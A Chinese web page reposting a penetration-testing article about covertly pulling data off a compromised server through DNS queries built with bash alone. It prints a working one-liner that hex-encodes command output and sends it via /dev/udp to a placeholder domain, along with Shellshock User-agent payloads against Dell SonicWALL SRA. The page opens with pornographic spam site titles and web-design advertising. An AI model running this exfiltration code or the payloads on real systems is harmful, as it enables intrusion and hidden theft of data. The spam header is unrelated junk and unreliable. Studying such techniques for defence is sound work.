日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問(wèn)題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營(yíng)銷解決方案
如何在滲透測(cè)試中利用BASH和DNS下載數(shù)據(jù)

在滲透測(cè)試過(guò)程中,拿到服務(wù)器權(quán)限之后從服務(wù)器下載數(shù)據(jù)是一件比較費(fèi)勁的事情,因?yàn)榉?wù)器一般都有防火墻在前面擋著。防火墻一般都會(huì)禁止服務(wù)器對(duì)外建立連接,這種情況下使用DNS來(lái)下載數(shù)據(jù)是一種行之有效的方法,因?yàn)榉阑饓σ话悴粫?huì)禁止對(duì)外的DNS查詢,本文中作者將根據(jù)一個(gè)具體的實(shí)例來(lái)講解這個(gè)方法。

創(chuàng)新互聯(lián)專注于陽(yáng)明企業(yè)網(wǎng)站建設(shè),成都響應(yīng)式網(wǎng)站建設(shè)公司,商城網(wǎng)站開發(fā)。陽(yáng)明網(wǎng)站建設(shè)公司,為陽(yáng)明等地區(qū)提供建站服務(wù)。全流程定制制作,專業(yè)設(shè)計(jì),全程項(xiàng)目跟蹤,創(chuàng)新互聯(lián)專業(yè)和態(tài)度為您提供的服務(wù)

原理簡(jiǎn)述??

其實(shí)已經(jīng)有一些方法可以搞定這件事情,來(lái)將服務(wù)器上的數(shù)據(jù)拖出來(lái),但是存在的問(wèn)題是,這些既有的方法都需要借助一些Linux上的軟件,而有時(shí)候并不是所有環(huán)境中都裝了這些軟件。比如我常用A軟件來(lái)拖數(shù)據(jù),但是如果遇到一臺(tái)服務(wù)器上沒(méi)有這軟件,就白瞎了。所以,本文中使用BASH本身的功能來(lái)達(dá)到這一目的——通用、好用。

下面的代碼就是 POC:

LINE=`id`; domain="yourdomain.com";while read -r -n 1 char;
do var+=$(printf "%X" \'$char\');done<<<$LINE;b=0;e=60;l=${#var};
while [ $b -lt $l ];do >& /dev/udp/$RANDOM.$b."${var:$b:$e}".
$domain/53 0>&1;let b=b+60;done;>& /dev/udp/$RANDOM.theend.$domain/53
0>&1;unset var;unset var2

將上面的 domain 改為你自己的 DNS 服務(wù)器地址,LINE 是要執(zhí)行的系統(tǒng)命令,比如上例中是查看當(dāng)前id,domain指向你自己的server 地址,用來(lái)接受數(shù)據(jù)。在你自己的 server 上運(yùn)行下面這段 ruby 腳本:

dns.rb

這段腳本用來(lái)獲取數(shù)據(jù),比如執(zhí)行下面這段腳本:

在自己的機(jī)器上接受到的數(shù)據(jù)如下:

顯然這是一個(gè)行之有效的方法,但是,如果你遇到什么問(wèn)題,可以直接找[原博]跟作者交流。

一個(gè)實(shí)際案例

??之前我發(fā)現(xiàn)Dell SonicWALL Secure Remote Access (SRA)系列軟件有Shellshock漏洞,當(dāng)在http header中攜帶下面這樣的ua ,server返回的是200 :??

User-agent: () { :; }; /bin/ls

但是如果提交包含如下User-agent的請(qǐng)求,server端返回 500 錯(cuò)誤:

User-agent: () { :; }; /bin/fake

當(dāng)然也可以用下面的User-agent的請(qǐng)求確定,這套軟件確實(shí)有漏洞:

User-agent: () { :; }; /bin/sleep 60

現(xiàn)在問(wèn)題來(lái)了,在這種情況下,我只能執(zhí)行命令,卻無(wú)法得到回顯,我嘗試了所有對(duì)外的鏈接,都被 server 禁止了,只有 DNS 可以用,可以用 telnet 來(lái)發(fā)起 DNS 請(qǐng)求。在這種情況下,上面我給出的 POC 就變得很有用了,并且非常隱蔽。

其他

目前Dell已經(jīng)修復(fù)了這個(gè)漏洞,相關(guān)信息見:

https://support.software.dell.com/product-notification/133206?productName=SonicWALL%20SRA%20Series

參考信息來(lái)源:https://forsec.nl/2015/01/bash-data-exfiltration-through-dns-using-bash-builtin-functions/


網(wǎng)頁(yè)題目:如何在滲透測(cè)試中利用BASH和DNS下載數(shù)據(jù)
轉(zhuǎn)載來(lái)源:http://m.5511xx.com/article/ccedipe.html